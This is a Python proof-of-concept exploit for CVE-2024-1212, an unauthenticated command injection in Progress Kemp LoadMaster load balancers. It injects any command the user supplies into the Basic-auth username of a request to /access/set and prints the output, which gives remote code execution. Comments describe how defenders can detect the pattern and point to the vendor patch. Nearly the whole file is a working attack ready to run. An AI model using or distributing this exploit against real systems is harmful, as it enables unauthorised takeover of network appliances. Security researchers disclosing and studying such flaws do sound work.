# Exploit for CVE-2024-1212: Unauthenticated command injection in Progress Kemp LoadMaster
# Tested on: LoadMaster 7.2.59.0.22007
# Author: Dave Yesland @daveysec with Rhino Security Labs
import requests
from requests.auth import HTTPBasicAuth
import argparse
# Silence urllib3's warnings: the request below is sent with verify=False,
# so the appliance's TLS certificate is never validated.
requests.packages.urllib3.disable_warnings()

# Command-line interface: the appliance base URL and the command string.
cli = argparse.ArgumentParser(description="Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster")
cli.add_argument('target', help='The target (https://LoadmasterIP)')
cli.add_argument('command', help='The command to run')
args = cli.parse_args()
target = args.target

# HTTP Basic credentials are joined as "user:password", so a literal ':' in
# the username would cut it short. Each colon is swapped for the shell's
# $'\x3a' escape, which expands back to ':' on the receiving side.
command = args.command.replace(":", "$'\\x3a'")

# Response headers that are treated as ordinary; anything else is printed.
expected_headers = ("Date", "Connection", "Content-Type", "Transfer-Encoding")

# Defender's view: on the wire this is a single unauthenticated GET to
# /access/set?param=enableapi&value=1 whose Basic-auth *username* begins with
# a single quote and a semicolon and ends with ";echo '". Decoding the
# Authorization header on requests to this path and flagging usernames that
# contain quotes or semicolons detects the pattern; the durable fix is the
# vendor's patch for CVE-2024-1212, plus keeping the management interface off
# untrusted networks.
url = f"{target}/access/set?param=enableapi&value=1"
credentials = HTTPBasicAuth(f"';{command};echo '", "anything")
response = requests.get(url, auth=credentials, verify=False)

# Print every response header that is not in the ordinary set
# (exact, case-sensitive name comparison, as in the original).
for name, content in response.headers.items():
    if name in expected_headers:
        continue
    print(f"{name}: {content}")

# Print the body line by line and stop at the first line equal to
# ' -p anything'. NOTE(review): "anything" is the password sent above, so
# this line presumably marks the echoed tail of the request - confirm.
for line in response.text.splitlines():
    if line == ' -p anything':
        break
    print(line)